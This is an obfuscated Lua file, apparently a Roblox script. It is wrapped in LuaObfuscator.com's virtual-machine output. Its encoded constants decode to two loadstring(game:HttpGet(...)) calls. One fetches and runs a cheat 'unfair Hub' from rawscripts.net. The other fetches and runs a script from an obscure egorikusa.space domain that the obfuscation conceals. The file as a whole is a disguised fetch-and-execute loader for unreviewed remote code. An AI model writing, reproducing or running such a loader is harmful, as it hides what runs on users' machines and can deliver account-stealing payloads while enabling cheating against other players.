--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v122=0;local v123;while true do if (v122==1) then return v123;end if (v122==0) then v123=v5(v88,v19);v19=nil;v122=1;end end else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -(880 -(282 + 595)))^(v32-((1639 -(1523 + 114)) -1))))%((3 -(1 + 0))^(((v33-(2 -1)) -(v32-(620 -((790 -235) + 64)))) + (932 -(857 + 74)))) ;return v89-(v89%(569 -(367 + 201))) ;else local v90=((1994 -(68 + 997)) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and 1) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + 2 ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(118 -(32 + 85))) then return (v41 * (16441815 + 335401)) + (v40 * (14533 + 51003)) + (v39 * 256) + v38 ;end if (v37==(957 -(892 + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;v37=(953 -(802 + 150)) -(0 -0) ;end end end local function v24() local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(5 -(1140 -(116 + 1022)))) then if (v47==(0 + 0)) then if (v46==(997 -(915 + 82))) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=0 -0 ;end elseif (v47==2047) then return ((v46==(1187 -(1069 + 118))) and (v48 * ((2 -1)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(178 + 845) ) * (v45 + (v46/((3 -1)^(52 + 0)))) ;end if (v42==(793 -(368 + 423))) then v47=v20(v44,87 -66 ,97 -66 );v48=((v20(v44,(30 + 20) -(10 + (29 -21)) )==((10 -7) -2)) and  -1) or (443 -(416 + (885 -(814 + 45)))) ;v42=3;end if (v42==(3 -2)) then v45=(2 -1) + 0 ;v46=(v20(v44,1 -0 ,458 -(145 + 293) ) * ((432 -(44 + 21 + 365))^(1518 -(998 + 488)))) + v43 ;v42=1 + 1 ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=773 -(201 + 571) ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(886 -(261 + 624)) );v18=v18 + v49 ;local v51={};for v67=1 -0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(780 -(162 + 618))) then local v115=(function() return 0 + 0 ;end)();while true do if (v115==1) then v91=(function() return  #"!";end)();break;end if (v115~=(0 -0)) then else v92=(function() return v93();end)();v94=(function() return nil;end)();v115=(function() return 1 + 0 ;end)();end end end if ( #">"==v91) then if (v92== #"|") then v94=(function() return v93()~=0 ;end)();elseif (v92==(122 -(30 + 90))) then v94=(function() return v95();end)();elseif (v92~= #"asd") then else v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v53=(function() return function(v99,v100,v101) local v102=(function() return 0 -0 ;end)();local v103=(function() return;end)();while true do if (v102~=(0 + 0)) then else v103=(function() return 0 + 0 ;end)();while true do if (v103==(0 + 0)) then local v124=(function() return 0;end)();while true do if (v124==(1000 -(451 + 549))) then v99[v100-#"[" ]=(function() return v101();end)();return v99,v100,v101;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"<",v58 do FlatIdent_8199B,Type,v21,Cons,v24,v25,v59,v69=(function() return v52(FlatIdent_8199B,Type,v21,Cons,v24,v25,v59,v69);end)();end v57[ #"xnx"]=(function() return v21();end)();for v70= #"}",v23() do local v71=(function() return v21();end)();if (v20(v71, #"}", #"{")~=(0 + 0)) then else local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if ((0 -0)~=v106) then else local v119=(function() return 1384 -(746 + 638) ;end)();local v120=(function() return;end)();while true do if (v119~=(0 + 0)) then else v120=(function() return 0 -0 ;end)();while true do if ((1 -0)~=v120) then else v106=(function() return 1;end)();break;end if (v120==(0 -0)) then v107=(function() return 0;end)();v108=(function() return nil;end)();v120=(function() return 1;end)();end end break;end end end if (v106~=(2 + 0)) then else while true do if (2==v107) then local v125=(function() return 0 -0 ;end)();local v126=(function() return;end)();while true do if (v125~=(0 + 0)) then else v126=(function() return 0;end)();while true do if (v126~=(1 + 0)) then else v107=(function() return  #"xnx";end)();break;end if (v126~=0) then else if (v20(v109, #"}", #",")== #"\\") then v110[2 + 0 ]=(function() return v59[v110[398 -(115 + 281) ]];end)();end if (v20(v109,4 -2 ,2 + 0 )~= #"{") then else v110[ #"19("]=(function() return v59[v110[ #"xxx"]];end)();end v126=(function() return 1;end)();end end break;end end end if ( #"nil"==v107) then if (v20(v109, #"19(", #"xxx")~= #"!") then else v110[ #"0313"]=(function() return v59[v110[ #"0313"]];end)();end v54[v70]=(function() return v110;end)();break;end if (v107~= #":") then else local v128=(function() return 0 -0 ;end)();while true do if (v128~=1) then else v107=(function() return 2;end)();break;end if (v128==(0 -0)) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(867 -(550 + 317))) then local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if (v175==(0 -0)) then v176=(function() return 0;end)();while true do if (v176==(603 -(268 + 335))) then v110[ #"91("]=(function() return v22();end)();v110[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"]") then v110[ #"xnx"]=(function() return v23();end)();elseif (v108==(292 -(60 + 230))) then v110[ #"xxx"]=(function() return v23() -((5 -3)^(2 + 14)) ;end)();elseif (v108== #"91(") then local v195=(function() return 0;end)();local v196=(function() return;end)();while true do if (v195~=(285 -(134 + 151))) then else v196=(function() return 0;end)();while true do if (v196==(1456 -(282 + 1174))) then v110[ #"-19"]=(function() return v23() -((1667 -(970 + 695))^(30 -14)) ;end)();v110[ #"http"]=(function() return v22();end)();break;end end break;end end end v128=(function() return 1991 -(582 + 1408) ;end)();end end end if (v107==0) then local v129=(function() return 0 -0 ;end)();while true do if (v129~=0) then else v108=(function() return v20(v71,2 -0 , #"91(");end)();v109=(function() return v20(v71, #"xnxx",22 -16 );end)();v129=(function() return 1825 -(1195 + 629) ;end)();end if (v129==1) then v107=(function() return  #"|";end)();break;end end end end break;end if (v106~=(1 -0)) then else local v121=(function() return 1251 -(721 + 530) ;end)();while true do if (v121==1) then v106=(function() return 1273 -(945 + 326) ;end)();break;end if ((241 -(187 + 54))~=v121) then else v109=(function() return nil;end)();v110=(function() return nil;end)();v121=(function() return 1;end)();end end end end end end for v72= #" ",v23() do v55,v72,v28=(function() return v53(v55,v72,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[2 -1 ];local v65=v61[2 + 0 ];local v66=v61[3];return function(...) local v73=v64;local v74=v65;local v75=v66;local v76=v27;local v77=701 -(96 + 175 + 429) ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -(1087 -(461 + 625)) ;local v82={};local v83={};for v104=1288 -(993 + 295) ,v81 do if ((v104>=v75) or (1263>2229)) then v79[v104-v75 ]=v80[v104 + 1 + 0 ];else v83[v104]=v80[v104 + (1172 -(418 + 753)) ];end end local v84=(v81-v75) + 1 + 0 ;local v85;local v86;while true do local v105=0 + 0 ;while true do if ((2253==2253) and (v105==0)) then v85=v73[v77];v86=v85[1 + 0 ];v105=1 + 0 ;end if (v105==(530 -((1735 -(797 + 532)) + 123))) then if (v86<=(1774 -(1271 + 478 + 20))) then if (v86<=(1 + 1)) then if (v86<=(1322 -(1249 + 73))) then v83[v85[1 + 1 ]]={};elseif ((452==452) and (v86==(1146 -(466 + 679)))) then local v160=0 -0 ;local v161;local v162;while true do if (v160==(2 -(1 + 0))) then v83[v161 + (1901 -(106 + 1794)) ]=v162;v83[v161]=v162[v85[2 + 2 ]];break;end if ((v160==(0 + 0)) or (4557<2087)) then v161=v85[5 -3 ];v162=v83[v85[3]];v160=2 -(2 -1) ;end end else v83[v85[116 -(4 + 110) ]]();end elseif ((3874==3874) and (v86<=(587 -(57 + 527)))) then v83[v85[1429 -(41 + 1386) ]]=v85[106 -(17 + 86) ]~=0 ;elseif (v86==(3 + 1)) then v83[v85[3 -1 ]]=v85[8 -5 ];else do return;end end elseif (v86<=((1376 -(373 + 829)) -(122 + 44))) then if (v86<=6) then local v134;local v135,v136;local v137;local v138;v83[v85[2 -0 ]]=v63[v85[9 -6 ]];v77=v77 + 1 + 0 ;v85=v73[v77];v138=v85[1 + 1 ];v137=v83[v85[5 -2 ]];v83[v138 + (66 -(30 + 35)) ]=v137;v83[v138]=v137[v85[4]];v77=v77 + 1 ;v85=v73[v77];v83[v85[(733 -(476 + 255)) + 0 ]]=v85[1260 -(1043 + 214) ];v77=v77 + (3 -2) ;v85=v73[v77];v83[v85[(2344 -(369 + 761)) -(323 + 889) ]]=v85[7 -(3 + 1) ]~=(580 -(361 + 219)) ;v77=v77 + (321 -(53 + 267)) ;v85=v73[v77];v138=v85[1 + 1 ];v135,v136=v76(v83[v138](v13(v83,v138 + (414 -((27 -12) + 398)) ,v85[5 -2 ])));v78=(v136 + v138) -((1221 -(64 + 174)) -(3 + 15 + 964)) ;v134=0 -0 ;for v157=v138,v78 do v134=v134 + 1 + 0 ;v83[v157]=v135[v134];end v77=v77 + 1 ;v85=v73[v77];v138=v85[2 + 0 ];v83[v138]=v83[v138](v13(v83,v138 + (851 -(20 + 830)) ,v78));v77=v77 + 1 + 0 ;v85=v73[v77];v83[v85[(189 -61) -(116 + 10) ]]();v77=v77 + 1 + 0 ;v85=v73[v77];v83[v85[740 -(542 + (532 -(144 + 192))) ]]=v63[v85[3]];v77=v77 + 1 ;v85=v73[v77];v83[v85[3 -1 ]]=v63[v85[1 + 2 ]];v77=v77 + 1 ;v85=v73[v77];v138=v85[2 + 0 ];v137=v83[v85[(218 -(42 + 174)) + 1 ]];v83[v138 + (2 -1) ]=v137;v83[v138]=v137[v85[4]];elseif (v86==(17 -10)) then v77=v85[1554 -(1126 + 425) ];else local v166=0;local v167;local v168;local v169;local v170;while true do if (v166==(405 -(118 + 287))) then v167=v85[7 -5 ];v168,v169=v76(v83[v167](v13(v83,v167 + ((843 + 279) -(118 + 1003)) ,v85[(7 + 1) -5 ])));v166=378 -(142 + 235) ;end if (v166==(4 -3)) then v78=(v169 + v167) -(1 + 0) ;v170=(416 + 561) -(553 + (1928 -(363 + 1141))) ;v166=3 -1 ;end if (v166==2) then for v189=v167,v78 do v170=v170 + 1 + 0 ;v83[v189]=v168[v170];end break;end end end elseif ((v86<=(10 + 0)) or (1938>4935)) then if (v86==((1586 -(1183 + 397)) + 3)) then for v177=v85[1 + 1 ],v85[(5 -3) + 1 ] do v83[v177]=nil;end elseif ((v83[v85[2]]==v85[4]) or (4255<3423)) then v77=v77 + (2 -1) ;else v77=v85[7 -4 ];end elseif (v86>(24 -13)) then local v171=v85[2];v83[v171]=v83[v171](v13(v83,v171 + 1 + 0 ,v78));else v83[v85[2]]=v63[v85[14 -11 ]];end v77=v77 + (754 -(239 + 514)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F3330363763353231362Q3162396531333934312Q306165332E6C7561033B3Q00682Q7470733A2Q2F726177736372697074732E6E65742F7261772F556E6976657273616C2D5363726970742D756E666169722D4875622D33393336001C9Q003Q001204000100014Q0009000200023Q00260A00010003000100010004073Q00030001001204000200013Q00260A00020006000100010004073Q0006000100120B000300023Q001206000400033Q00202Q00040004000400122Q000600056Q000700016Q000400076Q00033Q00024Q00030001000100122Q000300023Q00122Q000400033Q00202Q000400040004001204000600064Q0008000400064Q000C00033Q00022Q00020003000100010004073Q001B00010004073Q000600010004073Q001B00010004073Q000300012Q00053Q00017Q00",v9(),...);
